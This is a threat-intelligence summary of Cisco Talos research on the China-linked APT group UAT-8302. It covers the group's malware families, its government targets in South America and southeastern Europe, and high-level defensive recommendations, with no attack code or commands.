China-Linked APT UAT-8302 Deploys Shared Malware Against Governments in South America and Eastern Europe

TL;DR Cisco Talos has attributed a China-nexus APT group called UAT-8302 to government targeting campaigns in South America since late 2024 and southeastern Europe in 2025. The group deploys malware families including NetDraft (NosyDoor), CloudSorcerer, and VShell—tools shared with other China-aligned threat clusters—suggesting coordinated access to a common toolset. Initial access vectors remain unconfirmed, though exploitation of web application vulnerabilities is suspected.

What happened

A China-nexus APT group tracked by Cisco Talos as UAT-8302 has conducted intrusion campaigns targeting government entities across two regions. Attack activity against South American governments is documented since at least late 2024. A separate wave of targeting hit southeastern European government agencies in 2025.

Cisco Talos researchers Jungsoo An, Asheer Malhotra, and Brandon White published technical findings linking UAT-8302 to a sophisticated post-exploitation infrastructure. The group's malware arsenal includes tools previously attributed to multiple other China-aligned threat clusters—a pattern indicating either shared access to a common toolset or deliberate collaboration.

The primary backdoor deployed by UAT-8302 is NetDraft, also known as NosyDoor. This .NET-based malware is a C# variant of FINALDRAFT (aka Squidoor), which security vendors have previously linked to threat clusters including Ink Dragon, CL-STA-0049, Earth Alux, Jewelbug, and REF7707. ESET tracks NosyDoor deployments to a separate group it names LongNosedGoblin. The same malware has been observed in attacks on Russian IT organizations by a threat actor known as Erudite Mogwai (also tracked as Space Pirates and Webworm), according to Russian cybersecurity firm Solar.

UAT-8302's operational toolkit extends beyond NetDraft. The group deploys CloudSorcerer, a backdoor observed in Russian-focused attacks since May 2024. Version 3.0 of CloudSorcerer appears in UAT-8302 attack chains. SNOWLIGHT, a VShell stager previously used by UNC5174, UNC6586, and UAT-6382, is part of the group's infrastructure. UAT-8302 has also deployed a Rust-based variant of SNOWLIGHT called SNOWRUST.

Additional malware families in UAT-8302's operations include Deed RAT (aka Snappybee), a successor to ShadowPad, and Zingdoor—both tools previously deployed by Earth Estries in late 2024. Draculoader, a shellcode loader that delivers Crowdoor and HemiGate, has also appeared in UAT-8302 campaigns.

Initial access methods are not definitively known. The attack pattern suggests exploitation of zero-day or N-day vulnerabilities in web applications. Once inside a target network, UAT-8302 operators conduct reconnaissance, deploy open-source scanning tools such as gogo for automated network enumeration, and move laterally. Backdoor persistence is established through VShell deployment and supplemented with proxy and VPN tools including Stowaway and SoftEther VPN.

The activity reflects a broader trend in the China-nexus threat ecosystem. Trend Micro reported in October 2025 on "Premier Pass-as-a-Service," a model in which Earth Estries obtains initial access to target networks and transfers that access to Earth Naga for exploitation. This partnership is assessed to have operated since at least late 2023. Trend Micro noted that the model provides direct access to critical assets, reducing reconnaissance and lateral movement timelines, and that access appears restricted to a limited circle of actors.

Why it matters

For defenders in government and critical sectors across South America and southeastern Europe, this activity signals a persistent threat from a well-resourced group with access to mature tooling. The use of shared malware families across multiple tracked threat clusters complicates attribution and suggests either coordinated supply of tools or a shared development infrastructure.

The malware families deployed—NetDraft, CloudSorcerer, and VShell—are not commodity tools. Detection requires baseline knowledge of their signatures, behaviors, and command-and-control patterns. Many organizations may lack this telemetry if similar campaigns have not been previously observed in their regions.

The "Premier Pass-as-a-Service" model is operationally significant for SOC teams and network defenders. By accepting initial access from another group, UAT-8302 (or the receiving group) eliminates reconnaissance overhead and moves directly to exploitation. This compressed timeline reduces detection windows and leaves a smaller forensic footprint during early compromise phases.

For developers managing web-facing applications in government networks, the continued reliance on web application vulnerability exploitation—both zero-day and N-day—underscores the need for rapid patch cycles and compensating controls such as Web Application Firewalls (WAFs) and request rate limiting.

Affected systems and CVEs

NetDraft (NosyDoor)
CloudSorcerer (version 3.0)
VShell and SNOWLIGHT stagers
SNOWRUST (Rust-based SNOWLIGHT variant)
Deed RAT (Snappybee)
Zingdoor
Draculoader

No CVE assigned at the time of publication.

What to do

Monitor for lateral movement and network reconnaissance patterns typical of post-exploitation activity; implement network segmentation to limit attacker movement.
Hunt for use of open-source scanning tools such as gogo within network logs and process execution telemetry.
Prioritize patching of zero-day and N-day vulnerabilities in internet-facing web applications. Deploy Web Application Firewalls configured to detect exploitation patterns.
Monitor for and block proxy and VPN tools including Stowaway and SoftEther VPN at network boundaries and through endpoint controls.
Implement endpoint detection and response (EDR) tooling with signatures or behavioral heuristics for NetDraft, CloudSorcerer, VShell, SNOWLIGHT, SNOWRUST, Deed RAT, Zingdoor, and Draculoader.
Restrict execution of unsigned or untrusted binaries through application whitelisting to reduce the attack surface for stager deployment.
Review firewall and proxy logs for command-and-control communication patterns associated with the malware families named above.

Open questions

What initial access vectors does UAT-8302 employ beyond suspected web application exploitation.
Which specific government entities in South America and southeastern Europe have been targeted.
What is the full scope of the "Premier Pass-as-a-Service" model and how many threat actors participate in it.
Whether UAT-8302 continues active operations at the time of the Cisco Talos publication.
Whether NetDraft and other malware families share development infrastructure or are distributed through a supply chain shared by multiple China-nexus groups.